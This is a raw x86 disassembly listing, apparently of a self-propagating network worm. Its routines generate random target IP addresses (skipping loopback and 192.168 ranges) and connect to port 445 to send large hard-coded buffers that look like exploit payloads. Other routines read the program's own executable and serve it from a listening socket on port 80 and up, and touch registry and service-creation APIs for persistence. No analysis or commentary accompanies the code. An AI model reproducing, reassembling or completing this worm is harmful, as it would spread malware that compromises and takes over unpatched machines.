mov esp, ebp
pop ebp
retn
sub_43E033 endp
; ---------------------------------------------------------------------------
db 0FCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
mov dword ptr ds:loc_404089+3, eax
mov dword ptr ds:loc_404090, ebx
test dword ptr [eax+4], 6
jnz loc_43E138
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
mov dword ptr ds:loc_404090, eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_43E096: ; CODE XREF: .data:0043E12F�j
cmp esi, 0FFFFFFFFh
jz loc_43E147
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_43E126
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov dword ptr ds:loc_40402D+3, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov dword ptr ds:loc_404034, eax
mov eax, [edx+4]
mov dword ptr ds:loc_404036+2, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, sub_40403C
mov esi, dword ptr ds:loc_404034
rep movsd
lea edi, sub_40403C
mov dword ptr ds:loc_404034, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_43E126
js short loc_43E134
mov edi, [ebx+8]
push ebx
call sub_43E033
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_43DFD9
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_43E126: ; CODE XREF: .data:0043E0A7�j
; .data:0043E0FC�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_43E096
; ---------------------------------------------------------------------------
loc_43E134: ; CODE XREF: .data:0043E0FE�j
xor eax, eax
jmp short loc_43E1A9
; ---------------------------------------------------------------------------
loc_43E138: ; CODE XREF: .data:0043E076�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_43DFD9
add esp, 0Ch
loc_43E147: ; CODE XREF: .data:0043E099�j
push 0
mov dword ptr ds:loc_40400C+4, 0Bh
push 0Bh
call j_aARc
add esp, 8
or eax, eax
jnz short loc_43E182
push 0
mov dword ptr ds:loc_40400C+4, 8
push 8
call j_aARc
add esp, 8
or eax, eax
jnz short loc_43E182
mov eax, 1
jmp short loc_43E1A9
; ---------------------------------------------------------------------------
loc_43E182: ; CODE XREF: .data:0043E15F�j
; .data:0043E179�j
cmp eax, 0FFFFFFFFh
jz short loc_43E1B1
push eax
push dword ptr ds:loc_40400C+4
call j_aARc
add esp, 8
push dword ptr ds:loc_40400C+4
call sub_43F8FD
add esp, 4
mov eax, 1
loc_43E1A9: ; CODE XREF: .data:0043E136�j
; .data:0043E180�j ...
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_43E1B1: ; CODE XREF: .data:0043E185�j
cmp dword ptr ds:loc_40402B+1, 0
jnz short loc_43E1C1
mov eax, 1
jmp short loc_43E1A9
; ---------------------------------------------------------------------------
loc_43E1C1: ; CODE XREF: .data:0043E1B8�j
mov eax, dword ptr ds:loc_40402B+1
push 0Bh
jmp eax
; ---------------------------------------------------------------------------
dw 0B858h
dd 1, 0A164D7EBh, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push 40401Ch
push offset sub_40109A
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp-18h], esp
push eax
fnstcw word ptr [esp]
or word ptr [esp], 300h
fldcw word ptr [esp]
add esp, 4
push 0
push 0
push 404028h
push 404024h
push offset sub_404020
call sub_43F8C1
push dword ptr ds:loc_404027+1
push dword ptr ds:sub_404020+4
push dword ptr ds:sub_404020
mov dword ptr ds:loc_404012+2, esp
call sub_43F619
add esp, 18h
xor ecx, ecx
mov [ebp-4], ecx
push eax
call sub_43F8D9
leave
retn
; ---------------------------------------------------------------------------
db 64h, 0A3h, 0
dd 0C3000000h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E255 proc near ; CODE XREF: sub_43E2F0+12�p
var_35 = byte ptr -35h
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 2
lea eax, [ebp+var_35]
push eax
push [ebp+arg_0]
call sub_43F8B5
add esp, 0Ch
lea ecx, [ebp+var_35]
or eax, 0FFFFFFFFh
loc_43E278: ; CODE XREF: sub_43E255+28�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43E278
mov ebx, eax
mov [ebp+var_2], bl
mov [ebp+var_1], 0
jmp short loc_43E2A0
; ---------------------------------------------------------------------------
loc_43E28A: ; CODE XREF: sub_43E255+55�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
sub edx, eax
dec edx
mov al, [ebp+eax+var_35]
mov [edi+edx], al
add [ebp+var_1], 1
loc_43E2A0: ; CODE XREF: sub_43E255+33�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_43E28A
movzx eax, [ebp+var_2]
mov byte ptr [edi+eax], 0
mov [ebp+var_3], 0
jmp short loc_43E2CC
; ---------------------------------------------------------------------------
loc_43E2BA: ; CODE XREF: sub_43E255+88�j
push 404DE5h
push edi
call sub_43F939
add esp, 8
add [ebp+var_3], 1
loc_43E2CC: ; CODE XREF: sub_43E255+63�j
movzx eax, [ebp+var_3]
mov edx, 20h
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jl short loc_43E2BA
push [ebp+arg_8]
push edi
call sub_43F939
add esp, 8
pop edi
pop esi
pop ebx
leave
retn
sub_43E255 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E2F0 proc near ; CODE XREF: sub_43F411+97�p
var_32 = byte ptr -32h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34h
push offset sub_404DE3
lea eax, [ebp+var_32]
push eax
push [ebp+arg_0]
call sub_43E255
add esp, 0Ch
lea eax, [ebp+var_32]
push eax
call sub_43F729
leave
retn
sub_43E2F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E315 proc near ; CODE XREF: .data:0043F3CF�p
; sub_43F411+F1�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push eax
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_43F879
mov edi, eax
or edi, edi
jz short loc_43E345
xor eax, eax
jmp short loc_43E37D
; ---------------------------------------------------------------------------
loc_43E345: ; CODE XREF: sub_43E315+2A�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_43F8A9
mov edi, eax
push [ebp+var_4]
call sub_43F885
or edi, edi
jz short loc_43E36D
xor eax, eax
jmp short loc_43E37D
; ---------------------------------------------------------------------------
loc_43E36D: ; CODE XREF: sub_43E315+52�j
cmp [ebp+var_8], 1
jnz short loc_43E37A
mov eax, 2
jmp short loc_43E37D
; ---------------------------------------------------------------------------
loc_43E37A: ; CODE XREF: sub_43E315+5C�j
xor eax, eax
inc eax
loc_43E37D: ; CODE XREF: sub_43E315+2E�j
; sub_43E315+56�j ...
pop edi
leave
retn
sub_43E315 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E380 proc near ; CODE XREF: .data:0043F3A8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_43F891
mov edi, eax
or edi, edi
jz short loc_43E3A5
xor eax, eax
jmp short loc_43E3D0
; ---------------------------------------------------------------------------
loc_43E3A5: ; CODE XREF: sub_43E380+1F�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_43F89D
mov edi, eax
push [ebp+var_4]
call sub_43F885
or edi, edi
jz short loc_43E3CD
xor eax, eax
jmp short loc_43E3D0
; ---------------------------------------------------------------------------
loc_43E3CD: ; CODE XREF: sub_43E380+47�j
xor eax, eax
inc eax
loc_43E3D0: ; CODE XREF: sub_43E380+23�j
; sub_43E380+4B�j
pop edi
leave
retn
sub_43E380 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 200h
push ebx
push esi
push edi
xor ebx, ebx
push 0
push 100h
lea eax, [ebp-100h]
push eax
push dword ptr [ebp+8]
call sub_43F5D1
cmp eax, 0FFFFFFFFh
jz loc_43E517
push 404DDFh
lea eax, [ebp-100h]
push eax
call sub_43F951
add esp, 8
or eax, eax
jz loc_43E4D9
push 404DDBh
lea edx, [ebp-100h]
push edx
call sub_43F951
add esp, 8
or eax, eax
jz loc_43E4D9
push 0
push 3Dh
push 404D9Dh
push dword ptr [ebp+8]
call sub_43F5DD
push dword ptr ds:loc_403001+3
push 404D86h
lea eax, [ebp-200h]
push eax
call sub_43F921
add esp, 0Ch
lea ecx, [ebp-200h]
or eax, 0FFFFFFFFh
loc_43E46C: ; CODE XREF: .data:0043E471�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43E46C
push 0
push eax
lea edx, [ebp-200h]
push edx
push dword ptr [ebp+8]
call sub_43F5DD
loc_43E485: ; CODE XREF: .data:0043E4CB�j
mov eax, dword ptr ds:loc_403001+3
mov edi, eax
sub edi, ebx
cmp edi, 1000h
jb short loc_43E49B
mov edi, 1000h
loc_43E49B: ; CODE XREF: .data:0043E494�j
or edi, edi
jz short loc_43E4CD
push 0
push edi
mov eax, ebx
add eax, dword ptr ds:loc_403006+2
push eax
push dword ptr [ebp+8]
call sub_43F5DD
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_43E517
cmp esi, 1000h
jb short loc_43E4CD
add ebx, esi
push 64h
call sub_43F789
jmp short loc_43E485
; ---------------------------------------------------------------------------
loc_43E4CD: ; CODE XREF: .data:0043E49D�j
; .data:0043E4C0�j
push 404098h
call sub_43F741
jmp short loc_43E4FB
; ---------------------------------------------------------------------------
loc_43E4D9: ; CODE XREF: .data:0043E416�j
; .data:0043E432�j
push 0
push 15h
push 404D70h
push dword ptr [ebp+8]
call sub_43F5DD
push 0
push 0Dh
push offset sub_40409C
push dword ptr [ebp+8]
call sub_43F5DD
loc_43E4FB: ; CODE XREF: .data:0043E4D7�j
push 7D0h
call sub_43F789
push 2
push dword ptr [ebp+8]
call sub_43F5E9
push dword ptr [ebp+8]
call sub_43F571
loc_43E517: ; CODE XREF: .data:0043E3FA�j
; .data:0043E4B8�j
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 0
push 404098h
call sub_43F735
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push offset sub_403010
call sub_43F759
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_43E55D
push 1
call sub_43F6C9
loc_43E55D: ; CODE XREF: .data:0043E554�j
push 0
push ebx
call sub_43F6ED
mov dword ptr ds:loc_403001+3, eax
push eax
push 0
call sub_43F74D
mov dword ptr ds:loc_403006+2, eax
push 0
lea eax, [ebp-30h]
push eax
push dword ptr ds:loc_403001+3
push dword ptr ds:loc_403006+2
push ebx
call sub_43F765
push ebx
call sub_43F705
push 0
push 1
push 2
call sub_43F5F5
mov esi, eax
push 10h
lea eax, [ebp-24h]
push eax
call sub_43F77D
mov word ptr [ebp-24h], 2
and dword ptr [ebp-20h], 0
mov word ptr [ebp-26h], 0
loc_43E5BD: ; CODE XREF: .data:0043E5FD�j
movzx eax, word ptr [ebp-26h]
add eax, 50h
mov word ptr ds:loc_404094, ax
movzx eax, word ptr ds:loc_404094
push eax
call sub_43F5A1
mov edx, eax
mov [ebp-22h], dx
push 10h
lea eax, [ebp-24h]
push eax
push esi
call sub_43F565
mov [ebp-2Ch], eax
inc word ptr [ebp-26h]
or eax, eax
jz short loc_43E5FF
movzx eax, word ptr [ebp-26h]
cmp eax, 0FDE8h
jl short loc_43E5BD
loc_43E5FF: ; CODE XREF: .data:0043E5F2�j
push 64h
push esi
call sub_43F5C5
mov dword ptr [ebp-4], 10h
loc_43E60E: ; CODE XREF: .data:0043E639�j
lea eax, [ebp-4]
push eax
lea eax, [ebp-14h]
push eax
push esi
call sub_43F559
mov edi, eax
lea eax, [ebp-34h]
push eax
push 0
push edi
push 40141Ah
push 0
push 0
call sub_43F7AD
push eax
call sub_43F705
jmp short loc_43E60E
; ---------------------------------------------------------------------------
db 5Fh
dd 0C3C95B5Eh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E640 proc near ; CODE XREF: .data:0043EE73�p
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_13 = byte ptr -13h
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
lea edi, [ebp+var_13]
lea esi, loc_4040A8+2
mov ecx, 4
rep movsd
lea edi, [ebp+var_18]
lea esi, loc_4040B9+1
mov ecx, 5
rep movsb
loc_43E669: ; CODE XREF: sub_43E640+51�j
; sub_43E640+74�j
call sub_43F909
mov ecx, 0DDh
cdq
idiv ecx
lea edi, [edx+3]
mov ebx, edi
mov [ebp+var_3], bl
mov [ebp+var_2], 0
jmp short loc_43E6BA
; ---------------------------------------------------------------------------
loc_43E686: ; CODE XREF: sub_43E640+81�j
mov al, [ebp+var_3]
movzx edx, [ebp+var_2]
cmp al, [ebp+edx+var_13]
jz short loc_43E669
movzx eax, [ebp+var_2]
cmp eax, 5
jnb short loc_43E6B6
movzx eax, [ebp+var_3]
movzx edx, [ebp+var_2]
movzx ecx, [ebp+edx+var_13]
cmp eax, ecx
jb short loc_43E6B6
movzx edx, [ebp+edx+var_18]
cmp eax, edx
jbe short loc_43E669
loc_43E6B6: ; CODE XREF: sub_43E640+5A�j
; sub_43E640+6B�j
inc [ebp+var_2]
loc_43E6BA: ; CODE XREF: sub_43E640+44�j
movzx eax, [ebp+var_2]
cmp eax, 10h
jb short loc_43E686
loc_43E6C3: ; CODE XREF: sub_43E640+AC�j
call sub_43F909
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_19], bl
movzx eax, [ebp+var_3]
cmp eax, 0C0h
jnz short loc_43E6EE
movzx eax, [ebp+var_19]
cmp eax, 0A8h
jz short loc_43E6C3
loc_43E6EE: ; CODE XREF: sub_43E640+A1�j
call sub_43F909
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_1A], bl
call sub_43F909
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_1B], bl
movzx eax, [ebp+var_1B]
push eax
movzx eax, [ebp+var_1A]
push eax
movzx eax, [ebp+var_19]
push eax
movzx eax, [ebp+var_3]
push eax
push 404D64h
push [ebp+arg_0]
call sub_43F921
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_43E640 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E741 proc near ; CODE XREF: .data:0043F078�p
var_89F4 = dword ptr -89F4h
var_89F0 = dword ptr -89F0h
var_89EC = dword ptr -89ECh
var_89E8 = dword ptr -89E8h
var_89E3 = byte ptr -89E3h
var_89E2 = word ptr -89E2h
var_89E0 = byte ptr -89E0h
var_89D8 = byte ptr -89D8h
var_8970 = byte ptr -8970h
var_6900 = byte ptr -6900h
var_68E2 = byte ptr -68E2h
var_6842 = byte ptr -6842h
var_6136 = dword ptr -6136h
var_6126 = byte ptr -6126h
var_6112 = byte ptr -6112h
var_60A2 = byte ptr -60A2h
var_55DE = byte ptr -55DEh
var_403A = byte ptr -403Ah
var_4039 = byte ptr -4039h
var_3FBD = byte ptr -3FBDh
var_37ED = byte ptr -37EDh
var_3342 = byte ptr -3342h
var_3058 = dword ptr -3058h
var_3054 = dword ptr -3054h
var_3050 = dword ptr -3050h
var_304C = word ptr -304Ch
var_304A = word ptr -304Ah
var_3048 = dword ptr -3048h
var_303C = byte ptr -303Ch
var_3039 = byte ptr -3039h
var_300F = byte ptr -300Fh
var_300D = byte ptr -300Dh
var_300C = byte ptr -300Ch
var_2FC7 = byte ptr -2FC7h
var_2F83 = byte ptr -2F83h
var_2987 = byte ptr -2987h
var_21A3 = byte ptr -21A3h
var_2193 = byte ptr -2193h
var_1E6F = byte ptr -1E6Fh
var_1E6B = byte ptr -1E6Bh
var_1E5F = byte ptr -1E5Fh
var_1BDA = byte ptr -1BDAh
var_1BD9 = byte ptr -1BD9h
var_B46 = byte ptr -0B46h
var_82 = byte ptr -82h
var_81 = byte ptr -81h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_4F = byte ptr -4Fh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 89F4h
call sub_43F67D
push ebx
push esi
push edi
mov [ebp+var_3054], 1
mov [ebp+var_89F0], 1
lea edi, [ebp+var_89E0]
lea esi, loc_4049EC+4
movsd
movsd
and [ebp+var_89F4], 0
mov [ebp+var_89E2], 1BDh
push 0
push 1
push 2
call sub_43F5F5
mov [ebp+var_54], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED97
mov eax, [ebp+arg_0]
mov [ebp+var_89EC], eax
push eax
call sub_43F5B9
push 1Dh
push eax
lea edi, [ebp+var_6900]
push edi
call sub_43F795
lea eax, [ebp+var_6900]
push eax
push 404D5Ah
lea eax, [ebp+var_7C]
push eax
call sub_43F921
add esp, 0Ch
xor ebx, ebx
loc_43E7D2: ; CODE XREF: sub_43E741+A2�j
mov dl, [ebp+ebx+var_7C]
mov [ebp+ebx*2+var_50], dl
mov [ebp+ebx*2+var_4F], 0
inc ebx
cmp ebx, 28h
jl short loc_43E7D2
push 60h
push 404525h
lea eax, [ebp+var_303C]
push eax
call sub_43F8E5
lea eax, [ebp+var_7C]
push eax
call sub_43F7A1
mov edi, eax
shl edi, 1
push edi
lea edi, [ebp+var_50]
push edi
lea edi, [ebp+var_300C]
push edi
call sub_43F8E5
lea eax, [ebp+var_7C]
push eax
call sub_43F7A1
push 9
push offset sub_40457C
mov edi, eax
shl edi, 1
lea edi, [ebp+edi+var_300D]
push edi
call sub_43F8E5
lea eax, [ebp+var_7C]
push eax
call sub_43F7A1
mov edx, eax
movsx edi, dl
shl edi, 1
add edi, 34h
mov edx, edi
mov [ebp+var_403A], dl
push 1
lea eax, [ebp+var_403A]
push eax
lea eax, [ebp+var_3039]
push eax
call sub_43F8E5
lea eax, [ebp+var_7C]
push eax
call sub_43F7A1
mov edx, eax
movsx edi, dl
shl edi, 1
add edi, 9
mov edx, edi
mov [ebp+var_89E3], dl
push 1
lea eax, [ebp+var_89E3]
push eax
lea eax, [ebp+var_300F]
push eax
call sub_43F8E5
mov eax, [ebp+arg_4]
mov [ebp+var_3058], eax
push 0E29h
push 31h
lea eax, [ebp+var_4039]
push eax
call sub_43F8F1
add esp, 48h
push 10h
lea eax, [ebp+var_304C]
push eax
call sub_43F77D
mov [ebp+var_304C], 2
movsx eax, [ebp+var_89E2]
movzx eax, ax
push eax
call sub_43F5A1
mov edi, eax
mov [ebp+var_304A], di
mov eax, [ebp+arg_0]
mov [ebp+var_3048], eax
push 10h
lea eax, [ebp+var_304C]
push eax
push [ebp+var_54]
call sub_43F57D
cmp eax, 0FFFFFFFFh
jnz short loc_43E914
mov [ebp+var_3054], 2
jmp loc_43ED8F
; ---------------------------------------------------------------------------
loc_43E914: ; CODE XREF: sub_43E741+1C2�j
push 64h
call sub_43F789
push 0
push 89h
push 404313h
push [ebp+var_54]
call sub_43F5DD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F789
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5D1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED85
push 0
push 0A8h
push 40439Dh
push [ebp+var_54]
call sub_43F5DD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F789
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5D1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED85
push 0
push 0DEh
push 404446h
push [ebp+var_54]
call sub_43F5DD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F789
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5D1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED85
mov eax, [ebp+var_80]
cmp eax, 0FFFFFFFFh
jz short loc_43E9EE
cmp eax, 46h
jge short loc_43E9F3
loc_43E9EE: ; CODE XREF: sub_43E741+2A6�j
jmp loc_43ED85
; ---------------------------------------------------------------------------
loc_43E9F3: ; CODE XREF: sub_43E741+2AB�j
lea eax, [ebp+var_2F83]
mov [ebp+var_89E8], eax
cmp byte ptr [eax], 31h
setnz al
and eax, 1
mov [ebp+var_3050], eax
jz loc_43EB07
push 0DACh
push 90h
lea eax, [ebp+var_2987]
push eax
call sub_43F8F1
push 4
imul eax, [ebp+var_3050], 3Ch
lea eax, ds:404938h[eax]
push eax
lea eax, [ebp+var_21A3]
push eax
call sub_43F8E5
push [ebp+arg_8]
push [ebp+var_3058]
lea eax, [ebp+var_2193]
push eax
call sub_43F8E5
push 4
push 404D55h
lea eax, [ebp+var_1E6F]
push eax
call sub_43F8E5
push 4
imul eax, [ebp+var_3050], 3Ch
lea eax, ds:404938h[eax]
push eax
lea eax, [ebp+var_1E6B]
push eax
call sub_43F8E5
push [ebp+var_3058]
call sub_43F7A1
push eax
push [ebp+var_3058]
lea edi, [ebp+var_1E5F]
push edi
call sub_43F8E5
add esp, 48h
xor ebx, ebx
loc_43EAAF: ; CODE XREF: sub_43E741+38B�j
mov dl, [ebp+ebx+var_2987]
mov [ebp+ebx*2+var_1BDA], dl
mov [ebp+ebx*2+var_1BD9], 0
inc ebx
cmp ebx, 0DACh
jl short loc_43EAAF
mov [ebp+var_82], 0
mov [ebp+var_81], 0
push 1C52h
push 31h
lea eax, [ebp+var_89D8]
push eax
call sub_43F8F1
push 1C52h
push 31h
lea eax, [ebp+var_6112]
push eax
call sub_43F8F1
add esp, 18h
jmp short loc_43EB69
; ---------------------------------------------------------------------------
loc_43EB07: ; CODE XREF: sub_43E741+2CD�j
push 7D0h
push 90h
lea eax, [ebp+var_68E2]
push eax
call sub_43F8F1
push [ebp+var_3058]
call sub_43F7A1
push eax
push [ebp+var_3058]
lea edi, [ebp+var_6842]
push edi
call sub_43F8E5
lea eax, [ebp+var_89E0]
push eax
call sub_43F7A1
push eax
lea edi, [ebp+var_89E0]
push edi
lea edi, [ebp+var_6126]
push edi
call sub_43F8E5
add esp, 24h
mov eax, dword ptr ds:loc_404937+1
mov [ebp+var_6136], eax
loc_43EB69: ; CODE XREF: sub_43E741+3C4�j
push 0
movsx eax, [ebp+var_403A]
add eax, 4
push eax
lea eax, [ebp+var_303C]
push eax
push [ebp+var_54]
call sub_43F5DD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F789
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5D1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED85
push 0
push 68h
push 404586h
push [ebp+var_54]
call sub_43F5DD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F789
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5D1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED85
push 0
push 0A0h
push offset sub_4045EF
push [ebp+var_54]
call sub_43F5DD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F789
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5D1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED85
cmp [ebp+var_3050], 0
jz loc_43ED11
push 68h
push offset sub_40479E
lea eax, [ebp+var_89D8]
push eax
call sub_43F8E5
push 1B5Ah
lea eax, [ebp+var_1BDA]
push eax
lea eax, [ebp+var_8970]
push eax
call sub_43F8E5
push 70h
push 404807h
lea eax, [ebp+var_6112]
push eax
call sub_43F8E5
push 0A5Eh
lea eax, [ebp+var_B46]
push eax
lea eax, [ebp+var_60A2]
push eax
call sub_43F8E5
push 84h
push 404878h
lea eax, [ebp+var_55DE]
push eax
call sub_43F8E5
add esp, 3Ch
push 0
push 10FCh
lea eax, [ebp+var_89D8]
push eax
push [ebp+var_54]
call sub_43F5DD
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_43F789
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_43F5D1
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43ED85
push 0
push 0FDCh
lea eax, [ebp+var_6112]
push eax
push [ebp+var_54]
call sub_43F5DD
cmp eax, 0FFFFFFFFh
jnz short loc_43ED77
jmp short loc_43ED77
; ---------------------------------------------------------------------------
loc_43ED11: ; CODE XREF: sub_43E741+4FA�j
push 7Ch
push 404690h
lea eax, [ebp+var_4039]
push eax
call sub_43F8E5
push 7D0h
lea eax, [ebp+var_68E2]
push eax
lea eax, [ebp+var_3FBD]
push eax
call sub_43F8E5
push 90h
push offset sub_40470D
lea eax, [ebp+var_37ED]
push eax
call sub_43F8E5
add esp, 24h
mov [ebp+var_3342], 0
push 0
push 0CF8h
lea eax, [ebp+var_4039]
push eax
push [ebp+var_54]
call sub_43F5DD
cmp eax, 0FFFFFFFFh
jnz short $+2
loc_43ED77: ; CODE XREF: sub_43E741+5CC�j
; sub_43E741+5CE�j
push 64h
call sub_43F789
and [ebp+var_3054], 0
loc_43ED85: ; CODE XREF: sub_43E741+216�j
; sub_43E741+258�j ...
push 2
push [ebp+var_54]
call sub_43F5E9
loc_43ED8F: ; CODE XREF: sub_43E741+1CE�j
push [ebp+var_54]
call sub_43F571
loc_43ED97: ; CODE XREF: sub_43E741+53�j
mov eax, [ebp+var_3054]
pop edi
pop esi
pop ebx
leave
retn
sub_43E741 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43EDA2 proc near ; CODE XREF: .data:loc_43EE16�p
var_32 = byte ptr -32h
push ebp
mov ebp, esp
sub esp, 34h
push esi
push edi
push 31h
lea eax, [ebp+var_32]
push eax
call sub_43F595
cmp eax, 0FFFFFFFFh
jnz short loc_43EDBE
xor eax, eax
jmp short loc_43EDD8
; ---------------------------------------------------------------------------
loc_43EDBE: ; CODE XREF: sub_43EDA2+16�j
lea eax, [ebp+var_32]
push eax
call sub_43F589
mov edi, eax
or edi, edi
jnz short loc_43EDD1
xor eax, eax
jmp short loc_43EDD8
; ---------------------------------------------------------------------------
loc_43EDD1: ; CODE XREF: sub_43EDA2+29�j
mov eax, [edi+0Ch]
mov esi, [eax]
mov eax, [esi]
loc_43EDD8: ; CODE XREF: sub_43EDA2+1A�j
; sub_43EDA2+2D�j
pop edi
pop esi
leave
retn
sub_43EDA2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
push edi
call sub_43F711
push eax
call sub_43F92D
mov esi, 254h
mov eax, esi
add eax, 0Ah
push eax
push 0
call sub_43F74D
mov ebx, eax
push esi
push 4040BFh
push ebx
call sub_43F8E5
add esp, 10h
loc_43EE16: ; CODE XREF: .data:0043EE30�j
; .data:0043EE6A�j ...
call sub_43EDA2
mov [ebp-10Ch], eax
or eax, eax
jnz short loc_43EE32
push 384h
call sub_43F8CD
pop ecx
jmp short loc_43EE16
; ---------------------------------------------------------------------------
loc_43EE32: ; CODE XREF: .data:0043EE23�j
mov al, [ebp-10Ch]
mov [ebp-111h], al
mov al, [ebp-10Bh]
mov [ebp-112h], al
mov al, [ebp-10Ah]
mov [ebp-135h], al
cmp byte ptr [ebp-111h], 7Fh
jnz short loc_43EE6C
push 384h
call sub_43F8CD
pop ecx
jmp short loc_43EE16
; ---------------------------------------------------------------------------
loc_43EE6C: ; CODE XREF: .data:0043EE5D�j
lea eax, [ebp-130h]
push eax
call sub_43E640
push 0
call sub_43F8CD
add esp, 8
